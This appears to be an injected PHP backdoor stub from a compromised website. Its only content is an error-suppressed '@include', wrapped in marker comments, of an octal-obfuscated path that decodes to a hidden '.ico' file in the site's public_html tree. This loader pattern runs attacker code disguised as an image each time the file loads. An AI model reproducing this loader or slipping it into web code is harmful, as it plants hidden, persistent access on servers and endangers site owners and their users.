<?php
/*d90f1*/

@include "\057h\157m\1451\057a\142a\141d\151r\147r\157u\160/\160u\142l\151c\137h\164m\154/\145s\157m\141b\157o\153s\056c\157m\057u\163e\162_\147u\151d\145/\147e\156e\162a\154/\056f\145c\145d\1463\144.\151c\157";

/*d90f1*/

